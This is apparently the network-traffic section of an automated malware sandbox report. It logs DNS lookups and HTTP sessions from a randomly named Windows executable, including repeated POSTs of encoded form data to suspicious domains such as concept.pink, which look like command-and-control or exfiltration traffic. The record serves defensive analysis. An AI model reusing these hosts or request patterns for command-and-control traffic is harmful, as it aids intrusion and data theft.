                            Sep 27, 2024 09:08:32.105669022 CEST804971720.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:32.105735064 CEST4971780192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:32.740308046 CEST4971780192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:33.758614063 CEST4971880192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:33.763659954 CEST804971820.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:33.763746977 CEST4971880192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:33.772583961 CEST4971880192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:33.777491093 CEST804971820.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:34.633534908 CEST804971820.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:34.633774042 CEST804971820.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:34.633840084 CEST4971880192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:35.287216902 CEST4971880192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:36.305536032 CEST4971980192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:36.311925888 CEST804971920.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:36.312030077 CEST4971980192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:36.320971012 CEST4971980192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:36.326581955 CEST804971920.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:36.328176975 CEST804971920.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:37.182132959 CEST804971920.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:37.182430983 CEST804971920.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:37.182482958 CEST4971980192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:37.834033012 CEST4971980192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:38.852593899 CEST4972080192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:38.857754946 CEST804972020.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:38.857866049 CEST4972080192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:38.863893986 CEST4972080192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:38.868943930 CEST804972020.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:39.718422890 CEST804972020.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:39.718503952 CEST804972020.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:39.718734980 CEST4972080192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:39.721198082 CEST4972080192.168.2.520.2.217.253
                            Sep 27, 2024 09:08:39.726074934 CEST804972020.2.217.253192.168.2.5
                            Sep 27, 2024 09:08:45.224948883 CEST4972180192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:45.229895115 CEST804972138.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:45.229996920 CEST4972180192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:45.241005898 CEST4972180192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:45.245946884 CEST804972138.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:46.112279892 CEST804972138.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:46.112339973 CEST804972138.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:46.112462044 CEST4972180192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:46.755899906 CEST4972180192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:47.774061918 CEST4972280192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:47.779186010 CEST804972238.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:47.779427052 CEST4972280192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:47.788252115 CEST4972280192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:47.793241024 CEST804972238.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:48.682331085 CEST804972238.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:48.682488918 CEST804972238.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:48.682674885 CEST4972280192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:49.302879095 CEST4972280192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:50.323815107 CEST4972380192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:50.328872919 CEST804972338.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:50.331264973 CEST4972380192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:50.363095999 CEST4972380192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:50.367968082 CEST804972338.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:50.368123055 CEST804972338.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:51.235686064 CEST804972338.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:51.235775948 CEST804972338.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:51.235856056 CEST4972380192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:51.865370989 CEST4972380192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:52.915014029 CEST4972480192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:52.920027971 CEST804972438.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:52.920106888 CEST4972480192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:52.939517021 CEST4972480192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:52.944449902 CEST804972438.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:53.830423117 CEST804972438.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:53.830517054 CEST804972438.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:53.830673933 CEST4972480192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:53.834178925 CEST4972480192.168.2.538.55.251.233
                            Sep 27, 2024 09:08:53.838995934 CEST804972438.55.251.233192.168.2.5
                            Sep 27, 2024 09:08:58.974745989 CEST4972580192.168.2.53.33.130.190
                            Sep 27, 2024 09:08:58.979609013 CEST80497253.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:58.979799986 CEST4972580192.168.2.53.33.130.190
                            Sep 27, 2024 09:08:58.990962982 CEST4972580192.168.2.53.33.130.190
                            Sep 27, 2024 09:08:58.995834112 CEST80497253.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:59.444253922 CEST80497253.33.130.190192.168.2.5
                            Sep 27, 2024 09:08:59.444354057 CEST4972580192.168.2.53.33.130.190
                            Sep 27, 2024 09:09:00.505959034 CEST4972580192.168.2.53.33.130.190
                            Sep 27, 2024 09:09:00.662705898 CEST80497253.33.130.190192.168.2.5
                            Sep 27, 2024 09:09:01.884262085 CEST4972680192.168.2.53.33.130.190
                            Sep 27, 2024 09:09:01.889379025 CEST80497263.33.130.190192.168.2.5
                            Sep 27, 2024 09:09:01.892854929 CEST4972680192.168.2.53.33.130.190
                            Sep 27, 2024 09:09:01.904606104 CEST4972680192.168.2.53.33.130.190
                            Sep 27, 2024 09:09:01.909461975 CEST80497263.33.130.190192.168.2.5
                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2024 09:07:57.312180996 CEST5983153192.168.2.51.1.1.1
                            Sep 27, 2024 09:07:57.325773001 CEST53598311.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:14.908211946 CEST6068453192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:15.038696051 CEST53606841.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:28.620058060 CEST4933453192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:29.631078005 CEST4933453192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:30.646583080 CEST4933453192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:31.208528042 CEST53493341.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:31.208569050 CEST53493341.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:31.208581924 CEST53493341.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:44.728863001 CEST5543353192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:45.222532034 CEST53554331.1.1.1192.168.2.5
                            Sep 27, 2024 09:08:58.838670015 CEST5662453192.168.2.51.1.1.1
                            Sep 27, 2024 09:08:58.972412109 CEST53566241.1.1.1192.168.2.5
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Sep 27, 2024 09:07:57.312180996 CEST192.168.2.51.1.1.10xd324Standard query (0)www.07t90q.vipA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:14.908211946 CEST192.168.2.51.1.1.10x3210Standard query (0)www.concept.pinkA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:28.620058060 CEST192.168.2.51.1.1.10x1a1eStandard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:29.631078005 CEST192.168.2.51.1.1.10x1a1eStandard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:30.646583080 CEST192.168.2.51.1.1.10x1a1eStandard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:44.728863001 CEST192.168.2.51.1.1.10x1957Standard query (0)www.kuaimaolife.shopA (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:58.838670015 CEST192.168.2.51.1.1.10x56ddStandard query (0)www.nodigitalsmoke.orgA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Sep 27, 2024 09:07:57.325773001 CEST1.1.1.1192.168.2.50xd324No error (0)www.07t90q.vip07t90q.vipCNAME (Canonical name)IN (0x0001)false
                            Sep 27, 2024 09:07:57.325773001 CEST1.1.1.1192.168.2.50xd324No error (0)07t90q.vip3.33.130.190A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:07:57.325773001 CEST1.1.1.1192.168.2.50xd324No error (0)07t90q.vip15.197.148.33A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:15.038696051 CEST1.1.1.1192.168.2.50x3210No error (0)www.concept.pinkconcept.pinkCNAME (Canonical name)IN (0x0001)false
                            Sep 27, 2024 09:08:15.038696051 CEST1.1.1.1192.168.2.50x3210No error (0)concept.pink217.160.0.27A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:31.208528042 CEST1.1.1.1192.168.2.50x1a1eNo error (0)www.5oxzis.top20.2.217.253A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:31.208569050 CEST1.1.1.1192.168.2.50x1a1eNo error (0)www.5oxzis.top20.2.217.253A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:31.208581924 CEST1.1.1.1192.168.2.50x1a1eNo error (0)www.5oxzis.top20.2.217.253A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:45.222532034 CEST1.1.1.1192.168.2.50x1957No error (0)www.kuaimaolife.shop38.55.251.233A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:58.972412109 CEST1.1.1.1192.168.2.50x56ddNo error (0)www.nodigitalsmoke.orgnodigitalsmoke.orgCNAME (Canonical name)IN (0x0001)false
                            Sep 27, 2024 09:08:58.972412109 CEST1.1.1.1192.168.2.50x56ddNo error (0)nodigitalsmoke.org3.33.130.190A (IP address)IN (0x0001)false
                            Sep 27, 2024 09:08:58.972412109 CEST1.1.1.1192.168.2.50x56ddNo error (0)nodigitalsmoke.org15.197.148.33A (IP address)IN (0x0001)false
                            • www.07t90q.vip
                            • www.concept.pink
                            • www.5oxzis.top
                            • www.kuaimaolife.shop
                            • www.nodigitalsmoke.org
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.5497123.33.130.190803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:07:57.344508886 CEST400OUTGET /9eeu/?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw== HTTP/1.1
                            Host: www.07t90q.vip
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Sep 27, 2024 09:08:04.850677967 CEST410INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Fri, 27 Sep 2024 07:08:04 GMT
                            Content-Type: text/html
                            Content-Length: 270
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 70 62 3d 33 46 4b 68 42 72 67 48 78 62 35 64 35 58 58 26 6a 7a 3d 73 59 78 6f 55 46 32 72 46 52 43 6b 68 61 41 6b 5a 2f 41 39 55 6a 37 64 4d 7a 54 42 7a 4b 73 64 35 36 6b 61 45 2b 74 42 4c 64 76 46 4b 30 4c 4c 41 64 41 43 2f 48 38 50 45 32 44 74 6a 71 51 70 6f 65 6d 4e 6a 6f 7a 6a 30 35 6e 47 35 70 47 2f 66 6d 79 37 65 4f 76 75 77 4d 51 44 54 63 30 63 66 75 70 55 2f 56 66 46 71 67 55 6c 49 45 38 6a 2b 54 4d 52 67 56 45 6e 4b 73 66 6f 46 74 7a 68 44 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?npb=3FKhBrgHxb5d5XX&jz=sYxoUF2rFRCkhaAkZ/A9Uj7dMzTBzKsd56kaE+tBLdvFK0LLAdAC/H8PE2DtjqQpoemNjozj05nG5pG/fmy7eOvuwMQDTc0cfupU/VfFqgUlIE8j+TMRgVEnKsfoFtzhDw=="}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.549713217.160.0.27803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:15.103463888 CEST654OUTPOST /4yov/ HTTP/1.1
                            Host: www.concept.pink
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.concept.pink
                            Referer: http://www.concept.pink/4yov/
                            Connection: close
                            Content-Length: 203
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 55 48 36 6c 6f 64 38 50 2f 31 70 6e 4f 49 43 4d 39 59 30 4c 34 35 51 33 75 79 62 4f 48 65 6e 42 74 6b 31 2b 67 58 78 33 55 74 32 6a 6c 63 52 73 48 4c 6a 41 6e 44 7a 4c 52 79 2f 71 41 75 6b 45 74 67 61 37 6d 5a 38 37 76 66 46 50 38 2f 74 2b 6f 44 74 56 6f 4d 5a 30 51 4b 49 39 75 4c 66 2b 41 44 59 54 33 55 68 59 57 55 6c 4a 4f 51 5a 74 51 57 78 47 55 68 59 32 6c 34 4f 41 5a 65 4f 48 44 48 65 68 51 46 30 74 67 39 50 6c 76 73 32 74 7a 6a 32 75 49 4a 63 42 53 4f 41 4e 6f 4f 31 66 38 70 45 70 4b 6d 75 71 41 4e 2f 55 57 37 74 4e 64 54 56 68 61 4c 36 6d 72 45 73 3d
                            Data Ascii: jz=9JO441eEy3RNUH6lod8P/1pnOICM9Y0L45Q3uybOHenBtk1+gXx3Ut2jlcRsHLjAnDzLRy/qAukEtga7mZ87vfFP8/t+oDtVoMZ0QKI9uLf+ADYT3UhYWUlJOQZtQWxGUhY2l4OAZeOHDHehQF0tg9Plvs2tzj2uIJcBSOANoO1f8pEpKmuqAN/UW7tNdTVhaL6mrEs=
                            Sep 27, 2024 09:08:15.712882996 CEST1236INHTTP/1.1 200 OK
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Date: Fri, 27 Sep 2024 07:08:15 GMT
                            Server: Apache
                            Content-Encoding: gzip
                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                            Sep 27, 2024 09:08:15.712937117 CEST899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.549714217.160.0.27803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:17.647696972 CEST674OUTPOST /4yov/ HTTP/1.1
                            Host: www.concept.pink
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.concept.pink
                            Referer: http://www.concept.pink/4yov/
                            Connection: close
                            Content-Length: 223
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 44 42 74 41 78 2b 6a 55 70 33 52 74 32 6a 71 38 52 70 5a 37 6a 31 6e 44 75 30 52 79 7a 71 41 75 77 45 74 6b 53 37 6d 49 38 34 39 2f 46 4e 30 66 74 34 31 7a 74 56 6f 4d 5a 30 51 4b 73 48 75 4c 58 2b 41 53 6f 54 6d 47 46 5a 56 55 6c 4b 4a 51 5a 74 42 6d 77 4e 55 68 59 41 6c 35 6a 56 5a 59 4b 48 44 47 75 68 51 58 63 75 72 39 50 6a 6c 4d 33 38 77 7a 44 56 50 6f 52 4a 65 64 5a 6f 30 4f 4e 33 30 2f 70 44 51 45 6d 43 54 74 54 73 47 6f 6c 36 4d 6a 30 49 41 6f 71 57 31 54 37 7a 62 4a 46 2b 77 31 31 39 61 74 55 6a 46 76 5a 66 63 4e 44 4e
                            Data Ascii: jz=9JO441eEy3RNVmKl7uEP5VpkX4CMoo0P45c3uzfgHMDBtAx+jUp3Rt2jq8RpZ7j1nDu0RyzqAuwEtkS7mI849/FN0ft41ztVoMZ0QKsHuLX+ASoTmGFZVUlKJQZtBmwNUhYAl5jVZYKHDGuhQXcur9PjlM38wzDVPoRJedZo0ON30/pDQEmCTtTsGol6Mj0IAoqW1T7zbJF+w119atUjFvZfcNDN
                            Sep 27, 2024 09:08:18.277955055 CEST1236INHTTP/1.1 200 OK
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Date: Fri, 27 Sep 2024 07:08:18 GMT
                            Server: Apache
                            Content-Encoding: gzip
                            Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                            Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                            Sep 27, 2024 09:08:18.277988911 CEST899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                            Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.549715217.160.0.27803628C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
                            TimestampBytes transferredDirectionData
                            Sep 27, 2024 09:08:20.421360016 CEST1691OUTPOST /4yov/ HTTP/1.1
                            Host: www.concept.pink
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.concept.pink
                            Referer: http://www.concept.pink/4yov/
                            Connection: close
                            Content-Length: 1239
                            Content-Type: application/x-www-form-urlencoded
                            Cache-Control: no-cache
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
                            Data Raw: 6a 7a 3d 39 4a 4f 34 34 31 65 45 79 33 52 4e 56 6d 4b 6c 37 75 45 50 35 56 70 6b 58 34 43 4d 6f 6f 30 50 34 35 63 33 75 7a 66 67 48 4d 4c 42 74 56 6c 2b 6b 45 56 33 53 74 32 6a 30 73 52 6f 5a 37 6a 53 6e 44 32 77 52 79 76 51 41 74 49 45 69 6d 4b 37 78 4d 6f 34 6b 50 46 4e 72 50 74 35 6f 44 74 4d 6f 49 39 77 51 4b 63 48 75 4c 58 2b 41 52 41 54 32 6b 68 5a 54 55 6c 4a 4f 51 5a 71 51 57 77 6c 55 68 51 51 6c 35 57 75 61 6f 71 48 43 6c 57 68 52 69 6f 75 70 64 50 68 6d 4d 33 6b 77 7a 66 4b 50 6f 4d 77 65 65 45 4e 30 4e 64 33 6c 71 4e 64 49 6d 6d 6d 4f 50 4c 4e 55 61 64 6c 5a 6c 67 50 48 4c 75 48 78 54 72 4d 5a 49 70 63 6d 46 4a 2f 64 2b 74 6e 45 71 55 50 51 62 6d 52 65 39 41 37 50 48 79 61 49 55 2f 35 4d 78 2f 47 4a 6a 6a 43 39 67 31 57 38 4b 44 47 64 4f 68 5a 2b 6f 4e 54 77 5a 70 53 37 5a 7a 49 2b 78 4d 61 76 51 6c 64 4c 38 65 74 47 56 2f 6a 76 36 58 78 67 71 6f 4a 31 51 55 56 61 5a 2b 41 58 6f 54 73 67 53 4a 4b 32 2f 77 6d 74 55 34 4f 32 61 4f 6d 6a 67 62 41 68 45 63 39 7a 51 6f 4a 73 68 75 50 57 34 54 [TRUNCATED]
